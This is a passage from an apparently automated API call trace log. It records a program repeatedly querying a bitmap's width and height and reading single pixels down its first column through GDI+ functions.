returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=108, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=109, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=110, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=111, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=112, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=113, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=114, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=115, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=116, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=117, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=118, color=0x4de220) returned 0x0 [0174.727] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.727] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.727] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=119, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=120, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=121, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=122, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=123, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=124, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=125, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=126, color=0x4de220) returned 0x0 [0174.728] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.728] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.728] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=127, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=128, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=129, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=130, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=131, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=132, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=133, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=134, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=135, color=0x4de220) returned 0x0 [0174.729] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.729] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.729] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=136, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=137, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=138, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=139, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=140, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=141, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=142, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=143, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=144, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.730] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=145, color=0x4de220) returned 0x0 [0174.730] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.730] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=146, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=147, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=148, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=149, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=150, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=151, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=152, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=153, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=154, color=0x4de220) returned 0x0 [0174.731] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.731] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.731] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=155, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=156, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=157, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=158, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=159, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=160, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=161, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=162, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=163, color=0x4de220) returned 0x0 [0174.732] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.732] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.732] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=164, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=165, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=166, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=167, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=168, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=169, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=170, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=171, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=172, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.733] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=173, color=0x4de220) returned 0x0 [0174.733] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.733] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=174, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=175, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=176, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=177, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=178, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=179, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=180, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=181, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=182, color=0x4de220) returned 0x0 [0174.734] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.734] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.734] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=183, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=184, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=185, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=186, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=187, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=188, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=189, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=190, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.735] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=191, color=0x4de220) returned 0x0 [0174.735] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.735] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.736] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=192, color=0x4de220) returned 0x0 [0174.736] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.736] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.736] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=193, color=0x4de220) returned 0x0 [0174.736] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.736] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.736] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=194, color=0x4de220) returned 0x0 [0174.736] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.736] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.736] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=195, color=0x4de220) returned 0x0 [0174.736] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=196, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=197, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=198, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=199, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=200, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=201, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=202, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=203, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.737] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.737] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=204, color=0x4de220) returned 0x0 [0174.737] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=205, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=206, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=207, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=208, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=209, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=210, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=211, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.738] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=212, color=0x4de220) returned 0x0 [0174.738] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.738] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=213, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=214, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=215, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight 